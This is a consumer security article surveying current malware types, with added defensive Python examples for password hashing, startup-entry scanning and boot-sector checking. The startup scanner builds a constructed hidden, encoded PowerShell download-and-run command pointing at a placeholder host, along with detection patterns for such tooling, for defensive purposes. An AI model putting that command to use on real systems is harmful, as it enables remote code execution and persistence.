The Most Dangerous Malware Right Now and What You Can Do About It
Malware has come a long way from the time of Word macro viruses and bad screen animations. Today's malware silently infects Windows PCs, Macs and Android devices through compromised websites, fake software updates, counterfeit apps and malicious email attachments. In many cases, users will never know their machines have been infected.
But unless you're targeted by the National Security Agency or a similar government agency, there are simple, effective ways to prevent malware infection. Installing and running antivirus programs, patching and updating software, and doing everyday work from a standard (non-administrator) account will stop most malware. Common sense, such as not installing "video players" pushed by porn sites and not opening unexpected emails or web links, will stop most of the rest.
Nevertheless, it's always best to be informed. So here's our list of the most dangerous forms of malware out there right now.
Possibly the worst kind of malware to ever affect the average computer user, encrypting ransomware makes sure you know you've been attacked. The ransomware encrypts all office, image, music and movie files on a machine (tax returns, family photos, downloaded movies and ripped songs), then demands money to free the files. Restoring locked files on a PC or Mac is sometimes possible from a backup drive, but newer forms of ransomware also encrypt any backup drive or network share that is connected to the machine at the time. Only a backup that is kept disconnected, or kept as copies the infected machine cannot overwrite, is safe.
Ransoms, often payable in Bitcoin, range from a few hundred dollars for individual victims to several thousand dollars for institutions such as hospitals, law enforcement agencies and school systems. The FBI estimates that victims lost about $25 million due to ransomware in 2015 (including recovery costs), and that the number will multiply many times in 2016.
Locking ransomware, some types of which are referred to as "police Trojans," doesn't encrypt files. Instead, it freezes up a computer or mobile device's screen, often with a warning that the user is under police surveillance, and demands money or a "fine" to unfreeze the screen. The world saw a wave of locking ransomware in 2012 and 2013, on both Windows PCs and Android devices, until victims figured out that restarting a machine in safe mode would bypass the lock screen. Criminals moved on to distributing encrypting ransomware instead.
Browser exploit kits aren't just one kind of malware. They're toolkits of exploits, each aimed at a particular flaw in a browser or in a browser plugin such as Adobe Flash Player, Microsoft Silverlight or other multimedia software. As a web page carrying the kit's code loads, the kit fingerprints the visiting browser's type and version, its installed plugins and the underlying operating system. (Windows PCs are most at risk.) The exploit kit then launches the attacks tailored for that configuration, and drops its malware only if one of them succeeds.
When an exploit gets through the browser's defenses, the resulting infection is called a drive-by download, because the victim has only to load a web page to become infected. Administrators of web pages hosting exploit kits often aren't even aware of it; criminals break into servers to add code to pages, or take advantage of the chaotic online-ad market to place malicious ads ("malvertising") onto well-known, supposedly clean websites. Keeping the browser and its plugins patched, and uninstalling plugins you don't use, removes most of what these kits have to aim at.
Botnet malware's main job isn't to steal information or extract money from you directly. Instead, it secretly borrows some of your PC's processing power and internet bandwidth, roping the infected machine into a remotely controlled network, or botnet, alongside thousands or even millions of other "robot" machines. Many botnets can be rented by the hour by criminals, who use them to crack passwords, send out spam or launch distributed denial-of-service (DDoS) attacks against websites. Most users won't learn their machines are part of a botnet until the computer slows down mysteriously, or the internet service provider complains that there's too much outgoing traffic.
A banking Trojan burrows into a web browser and silently waits until a user logs into an online bank account. It then records the account's username and password, and tries to capture whatever else the login asks for, such as the answer to a CAPTCHA or the keys clicked on an on-screen keyboard, often by injecting extra fields into the bank's own pages. For some banking Trojans, the job is done when the account credentials are sent to a criminal in Eastern Europe or Brazil. Others are more sophisticated: they log back into the bank account just after the user has logged out, then initiate transfers that end up with your money in a bank overseas.
If you're familiar with the Target, Home Depot or Neiman Marcus data breaches, then you're familiar with point-of-sale (PoS) infostealers. These specialized forms of malware infect checkout-counter card readers, or the back-room servers that run them, and scrape card numbers out of memory as transactions are processed, stealing them en masse. Contrary to what many people believe, the new "chip" cards don't stop credit-card theft. Instead, they make the stolen data much harder to use in a store, as it's very difficult to create a "clone" of a chipped card; the numbers remain usable for online purchases, where no physical card is presented.
Because most computers and websites don't save actual passwords, but instead save password "hashes" that can't practically be reversed, information thieves often need to rely on keyloggers to capture login credentials at the moment they're typed. Some keyloggers are small hardware devices plugged in between the keyboard and the PC, but today most are programs hiding in your computer to keep track of everything you type. If your online bank account asks you to enter your password by clicking letters on an on-screen keyboard, the account is trying to evade keyloggers, though some malware counters this by taking a screenshot at every mouse click.
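As an added example that is not part of the article, here is how a site stores and checks a salted password hash (PBKDF2-HMAC-SHA256 with a random per-account salt; the record format and iteration count are this example's own choices, not any particular site's). It shows why a stolen hash record doesn't let a thief log in, and, by implication, why thieves capture the password at the keyboard instead.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Parameters are this example's own choices: PBKDF2-HMAC-SHA256 with a 16-byte random salt.
# The iteration count is kept low so the demo runs quickly; use a much higher count
# (or a memory-hard function such as scrypt or Argon2) in production.
ITERATIONS = 50_000
SALT_LEN = 16


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a storable record: algorithm$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(SALT_LEN)   # fresh salt per account, so equal passwords hash differently
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False   # malformed record
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def demo() -> Dict[str, bool]:
    """Constructed account: the site keeps only the record, never the password."""
    record = hash_password("correct horse battery staple")
    return {
        "record_contains_password": "correct horse" in record,
        "right_password_accepted": verify_password("correct horse battery staple", record),
        "wrong_password_rejected": not verify_password("correct horse battery stapler", record),
        # Stealing the database yields the record, but presenting it as the password fails;
        # a thief still needs the original string, which is what a keylogger captures.
        "stolen_record_useless_as_password": not verify_password(record, record),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The constant-time comparison matters on the server side: a plain string comparison would leak, one byte at a time, how much of a guessed hash matched.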
It doesn't affect ordinary computer users, but malware created by national intelligence agencies to target specific groups or individuals is powerful, pervasive and nearly unstoppable. Much of it uses zero-day exploits unknown to the wider world, but developed and sold to intelligence agencies by private individuals and companies. Russia and China are well-known for breaking into Western corporations and government agencies, but Spain, Israel, Pakistan, Iran and India have also been suspected of hacking other countries' protected systems. North Korea stands out for the sheer brazenness of its attacks, and the U.S. National Security Agency's methods are thought to be years ahead of those used by other nations.
Malware may already have been used by nation-states to sabotage adversaries' infrastructures. No attribution has been confirmed, but the general consensus is that the U.S. and Israel used the Stuxnet worm to destroy Iranian uranium-processing equipment; Iran used the Shamoon malware to wipe the hard drives of tens of thousands of computers at the Saudi national oil company; and North Korea used a disk-wiping program that shared components with Shamoon to wipe hard drives at Sony Pictures Entertainment over what the country's government perceived to be an insulting movie. Lower-level cyberattacks are routinely launched at South Korea, presumably by North Korea, and similar attacks have plagued the former Soviet republics of Estonia, Georgia and Ukraine during times of conflict with Russia.
By loading itself directly into a computer's running memory during infection, fileless malware escapes disk scans and thereby evades traditional antivirus software. There's no rogue executable written to the hard drive, and hence nothing for a file scan to find. Some fileless malware achieves persistence, or survives a reboot, by writing an innocuous-looking entry in the Windows Registry's startup keys that tells a built-in tool such as PowerShell to fetch the malware from the internet, or to rebuild it from a script stashed elsewhere in the Registry, at every system startup. Checking those startup entries for hidden, encoded or download-and-run commands is one of the few practical ways to spot it.
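As an added example that is not part of the article, the following script scans Windows Run-key startup entries for the download-and-run pattern described above. The entries are constructed for the example (a benign OneDrive launcher, a hidden encoded PowerShell downloader pointing at a made-up host, and a script run from a public folder), and the heuristics and the two-indicator threshold are this example's own rather than any product's rules. On a real machine you would feed it the output of reg query or Get-ItemProperty on the HKCU and HKLM Run keys.

```python
import base64
import re
from typing import Dict, List, Optional

# Script hosts and other built-in Windows tools that fileless malware abuses to
# relaunch itself at startup.
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "rundll32", "regsvr32")

# Heuristics (this example's own list): each is (pattern, reason to report).
SUSPICIOUS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop(?:rofile)?\b", re.I), "profile disabled"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
     "fetches code from the network"),
    (re.compile(r"https?://", re.I), "URL in command"),
    (re.compile(r"\\Users\\Public\\|\\Temp\\|%temp%", re.I), "runs from a user-writable folder"),
]

# -e, -ec, -enc and -EncodedCommand all take a base64 blob of UTF-16LE PowerShell.
ENCODED = re.compile(r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def analyze_run_value(name: str, cmd: str) -> Dict:
    """Score one Run-key value; the decoded script is inspected along with the raw command."""
    reasons: List[str] = []
    if any(host in cmd.lower() for host in SCRIPT_HOSTS):
        reasons.append("launches a script host")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("base64-encoded command")
    text = cmd if decoded is None else cmd + " " + decoded
    for pattern, why in SUSPICIOUS:
        if pattern.search(text):
            reasons.append(why)
    # One indicator alone is common in legitimate software; two or more is worth a look.
    return {"name": name, "command": cmd, "decoded": decoded,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def scan_run_values(values: Dict[str, str]) -> List[Dict]:
    return [analyze_run_value(name, cmd) for name, cmd in values.items()]


def encode_powershell_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def build_sample_run_values() -> Dict[str, str]:
    """Constructed Run-key values for the demo; not captured from a real machine."""
    stage = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    return {
        "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        "Updater": "powershell.exe -nop -w hidden -enc " + encode_powershell_command(stage),
        "SyncHelper": r"wscript.exe //B C:\Users\Public\sync.vbs",
    }


if __name__ == "__main__":
    for result in scan_run_values(build_sample_run_values()):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['name']}: {', '.join(result['reasons']) or '-'}")
```

Decoding the -EncodedCommand blob before matching is the important step: the raw Run value of the "Updater" entry contains no URL and no download call, so a scanner that only looks at the stored string would miss it.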
Antivirus software can now find and remove most strains of rootkits, pieces of malware that burrow deep into the operating system. Far more difficult to remove are bootkits, which install themselves in places that ordinary antivirus software can't reach. Such places include the firmware (the BIOS, or basic input-output system, or its modern replacement UEFI) that starts the boot process when you press the power button, and the master boot record, the first 512-byte sector of a hard drive, which holds the code that hands off to the second stage of the boot process on an older Windows system. On a modern machine, UEFI Secure Boot refuses to run boot code that isn't signed, which blocks most bootkits aimed at the boot record; older BIOS-based systems have no such check, so comparing the boot sector against a known-good copy is the practical way to detect tampering.
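As an added example that is not part of the article, here is a parser for the 512-byte master boot record that checks the 0x55AA boot signature, decodes the four partition-table entries, and compares the boot-code area against a known-good SHA-256 baseline. The sector contents are constructed inside the script (placeholder boot code and two partitions), and the baseline comparison is this example's own approach rather than any antivirus product's; on a Linux or macOS system the real first sector can be read with dd if=/dev/sda bs=512 count=1 (administrator rights required, and the device name will differ).

```python
import hashlib
import struct
from typing import Dict, List, Tuple

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446           # bytes 0..445 hold the first-stage boot code
PART_TABLE_OFF = 446          # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510..511
ENTRY_FMT = "<B3sB3sII"       # status, CHS start, type, CHS end, LBA start, sector count

# Placeholder boot code for the demo (a 'jmp $' spin loop), standing in for a real loader.
CLEAN_BOOT_CODE = b"\xeb\xfe" + b"\x90" * 30
# Constructed 'infected' boot code: a bootkit typically overwrites the start of the
# sector with a jump to its own code and stashes the original loader elsewhere.
TAMPERED_BOOT_CODE = b"\xeb\x3c" + b"\x90" * 30
# (bootable, type, LBA start, sector count): an NTFS system partition and a Linux one.
SAMPLE_PARTITIONS = [(True, 0x07, 2048, 1_048_576), (False, 0x83, 1_050_624, 2_097_152)]


def build_mbr(boot_code: bytes, partitions: List[Tuple[bool, int, int, int]]) -> bytes:
    """Assemble a 512-byte MBR; CHS fields are set to the 'use LBA instead' marker."""
    if len(boot_code) > BOOT_CODE_LEN or len(partitions) > 4:
        raise ValueError("boot code too long or too many partitions")
    table = b"".join(
        struct.pack(ENTRY_FMT, 0x80 if bootable else 0x00, b"\xfe\xff\xff",
                    ptype, b"\xfe\xff\xff", lba, count)
        for bootable, ptype, lba, count in partitions
    )
    return boot_code.ljust(BOOT_CODE_LEN, b"\x00") + table.ljust(64, b"\x00") + BOOT_SIGNATURE


def parse_mbr(sector: bytes) -> Dict:
    """Validate the signature, decode the partition table and hash the boot code."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        entry = sector[PART_TABLE_OFF + 16 * i: PART_TABLE_OFF + 16 * (i + 1)]
        status, _, ptype, _, lba, count = struct.unpack(ENTRY_FMT, entry)
        if ptype == 0:
            continue  # empty slot
        partitions.append({"index": i, "bootable": status == 0x80,
                           "type": ptype, "lba_start": lba, "sectors": count})
    return {"boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
            "partitions": partitions}


def check_mbr(sector: bytes, known_good_sha256: str) -> List[str]:
    """Return findings; an empty list means the sector matches the recorded baseline."""
    info = parse_mbr(sector)
    findings = []
    if info["boot_code_sha256"] != known_good_sha256:
        findings.append("boot code differs from the known-good baseline (possible bootkit)")
    active = [p for p in info["partitions"] if p["bootable"]]
    if len(active) != 1:
        findings.append(f"{len(active)} partitions marked bootable; expected exactly one")
    return findings


if __name__ == "__main__":
    clean = build_mbr(CLEAN_BOOT_CODE, SAMPLE_PARTITIONS)
    baseline = parse_mbr(clean)["boot_code_sha256"]  # record this while the machine is known clean
    print("clean sector:   ", check_mbr(clean, baseline) or "matches baseline")
    tampered = build_mbr(TAMPERED_BOOT_CODE, SAMPLE_PARTITIONS)
    print("tampered sector:", check_mbr(tampered, baseline))
```

The baseline has to be taken from a trusted read (for instance, from a boot disk) and stored off the machine; a bootkit that controls the disk driver can hand the operating system a clean-looking copy of the sector, which is exactly why the article says ordinary antivirus software can't reach it.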